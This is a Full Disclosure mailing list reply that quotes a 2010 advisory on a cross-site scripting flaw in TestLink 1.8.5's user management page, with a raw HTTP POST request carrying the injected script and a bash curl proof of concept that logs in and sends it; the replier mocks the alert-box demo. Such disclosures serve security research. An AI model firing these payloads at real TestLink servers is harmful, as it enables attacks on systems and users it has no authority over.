Full Disclosure mailing list archives
Re: Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System
From: Jeff Williams <jeffwillis30 () gmail com>
Date: Sat, 16 Jan 2010 00:03:13 +1100
Prashant, Usually we do not mention the engineer/dev name's in a timeline, that's totaly a jackass move. Anyone civilized would mention in this case : "{DATE} <VENDOR NAME> says <CRAP>" Btw posting an "exploit" to trigger a Js alert, it's priceless; Dude you made my night. 2010/1/15 Prashant <clickprashant () rediffmail com>
1.Title :Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System. Discovered by: Prashant Khandelwal (clickprashant () gmail com) 2.Vulnerability Information Class: Cross site scriping Impact :Code execution Remotely Exploitable: Yes Locally Exploitable: No 3. Vulnerable packages. Versions affected :All versions <= Testlink 1.8.5 Download : http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc 4. Vulnerability Description Cross site scriping Vulnerability has been found in Testlink( http://www.teamst.org/) a popular and acclaimed free, open source Test management tool written in PHP. The issue discovered can only be exploited with an authenticated session.This cross site scripting vulnerability is present in the file /testlink/lib/usermanagement/usersView.php & can be exploited by setting the variable "order_by_login_dir" like below with a HTTP POST request Example HTTP header (tested on 1.8.5) Set the POST variable order_by_login_dir to >">alert(726367128870)%3B Request POST /testlink/lib/usermanagement/usersView.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: x.x.x.x Content-Length: 146 Cookie: PHPSESSID=8ea021778858f826c5aab8be8f38868c;TL_lastTestProjectForUserID_1=2381 Connection: Close Pragma: no-cache operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(726367128870)%3B&user_order_by=order_by_login 5. Proof Of Concept ====================== #!/usr/bin/env bash # Prashant Khandelwal [clickprashant () gmail com] # Cross site scripting in Testlink the Test Management Tool # Vendor : Testlink http://www.teamst.org # Affected Version : <=1.8.5 ( http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc ) # Vulnerability Discovered: 5-Jan-2010 # This POC is for educational purpose and has only been tested with testlink 1.8.5 if [ $# -ne 3 ] then echo "Usage - ./$0 User password Testlink_root_dir_URI" echo "Example - ./$0 admin admin http://Testlink-Server/testlink" exit 1 fi rm -rf cookies userView.php curl -d "tl_login=$1&tl_password=$2" $3/login.php -c cookies curl -d '"operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(123456789)%3B&user_order_by=order_by_login"' $3/lib/usermanagement/usersView.php -b cookies -v >userView.php echo "Please open userView.php in browser a java script alert with text 123456789 should pop up" ===================== 6. Report Timeline I) 5-Jan-2010 Vulnerability dicovered II) 11-Jan-2010 Notified about the vulnerability to the developer Francisco Mancardi & Martin Havlat from testlink team IV) 11-Jan-2010 Francisco Mancardi ask for POC. V) 14-Jan-2010 POC's given VI) 15-Jan-2010 Francisco Mancardi says these vulnerabilities cannot be patched at the moment and has not commited any timeline for fixing the same. <http://sigads.rediff.com/RealMedia/ads/click_nx.ads/www.rediffmail.com/signatureline.htm@Middle?> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System Prashant (Jan 15)
- Re: Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System Jeff Williams (Jan 15)